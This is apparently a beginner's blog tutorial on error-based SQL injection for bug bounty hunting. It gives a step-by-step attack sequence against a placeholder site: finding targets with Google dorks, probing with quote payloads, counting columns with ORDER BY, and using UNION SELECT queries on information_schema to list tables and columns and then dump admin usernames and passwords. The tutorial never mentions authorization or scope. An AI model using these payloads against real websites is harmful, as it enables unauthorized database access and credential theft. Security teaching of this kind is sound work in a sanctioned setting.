Every hacker who is new to or learning web application penetration testing (WAPT) is advised to review the OWASP TOP 10 because it has a detailed view of the latest vulnerabilitiesfound the most by hackers worldwide and also which are the most critical. The latest version ofOWASP TOP-10 was released in 2017.
Among the OWASP Top 10 are the A1 injections.This post will not be a thorough OWSAP guide, but it will be an awesome guide for you to get started in bug bounties.
SQL injection is a vulnerability which allows an attacker to execute SQL commands and can certainly gain access to a database; in the worst case scenario, it can even “SHUTDOWN THE SERVER” – very severe, isn’t it?
SQL Injection Has Three Types of Classifications: In-Band, Blind, and Out-Band
1. In-band SQLi is the classic SQLi, so it is easy to exploit!
It includes error-based and union-based injections. Today, we will only be seeing the error-based SQLi, just to be clear with the concepts and also to consider the length of the post.
2. Blind SQLi is a bit tough to encounter and hard to discover and exploit, but an automated tool can help easily.
It includes Boolean-based and time-based injections, basically playing TRUE/FALSE with the server.
3. Out-band basically depends on the server to allow DNS or HTTP requests where the attacker wants the attack results.
Before we start learning the steps to perform the same, we must know what SQL actually is.
What is SQL?
What is SQL (I asked in a workshop)?
They said structured query language.
Are they right or wrong? Basically, SQL’s full form is a structured query language and also the type of programming done with it, i.e., in a structured manner. But actually, SQL is an “Interpreted Language.” It is interpreted the same way you interpret your friend while talking!
In SQLi, you interpret the database server (MYSQL server or any other server type), and if it’s vulnerable, it’ll interpret your commands and will give you the answer as such (in this case, the database access).
Today, we will only be covering error-based SQLi, as it is the most commonly found and easy to exploit, in GET requests.
Let’s go step by step:
1. Find a website which has a query in it, like something you must have seen in a URL.
How to: using Google dorks. Site: www.eg.com inurl:php? (It depends on the programming language used for finding the query). We found:
2. Test whether it is vulnerable or not. To do so, you must pass the server some testing payloads.
Like ‘-single quote –> “-Double quote –> ‘) or “) –> / or –> ‘); or “);
And there are tons of different types; just Google them.
Now, what will happen when you do so is that the server will give you an error. Keep in mind that in our case, the server showed us the error while we sent the quote. In your case, it may not, so you will have to test all the different cases from above using double quotes, etc.
ERROR: Error in SQL syntax. Why the heck is it like that? Because as you sent the single quote, the query sent was like the SELECT category from product, where id = “5”‘ — notice the quote that threw the error “5,”‘ and as you know, a quote is complete with both the quotes we supplied on one: ‘-incomplete ”-complete.
Here, due to wrong programming, the dev has added the number in a quote, which should not be done.
3. Now, you will have to resolve the error by usingcomments –+ or — – . Sometimes, there’s no need of it.
www.eg.com?catid=5′ –+ (error resolved in our case)
4. Get the number of the columns in the DB.
Unknown column ’20’ in ‘order clause’
This means the 20th column is not in the DB.
Remember to do it one by one; order by 1 in first request and order by 2 in the second………
5. We encountered 5 columns. Now, you check the number of columns from which the data is fetched in the page where you are testing.
www.eg.com?catid=5′ Union Select 1,2,3,4,5–+
I stopped, as it only has 5 total columns. After this, the server will show you the numbers where the data is fetched from the page.
In our attempt : 2,3
6. Now, it’s time to enumerate into the database, as we got the 2,3 columns. These are the only paths for us to exploit the SQLi and get the data.
www.eg.com?catid=5′ Union Select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database() –+
– Above one will list the available tables in the database:
In Our Case : admin.products,images,ratings
www.eg.com?catid=5′ Union Select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=’admin’ –+
– Above one will list the available columns in the table admin.
In our case: id , username,password,email
NEXT: Let’s get the username and password!
www.eg.com?catid=5′ Union Select 1,username,password,4,5 from admin –+
-Above one will give us the username and password of the admin:
In our case: : adm!n , [email protected]
This seems complex in a post, but as you practice along with the post and follow each step, it’ll be easy for you!
Points to Remember
Remember the enumeration part is only to be performed by the columns from which the data is fetched in the page where you are performing the injection.
Thank you guys for reading the post. I hope this will be helpful to you!
Stay tuned until next time. HAPPY HACKING!
Credits: Ashish Jha, A security researcher from India.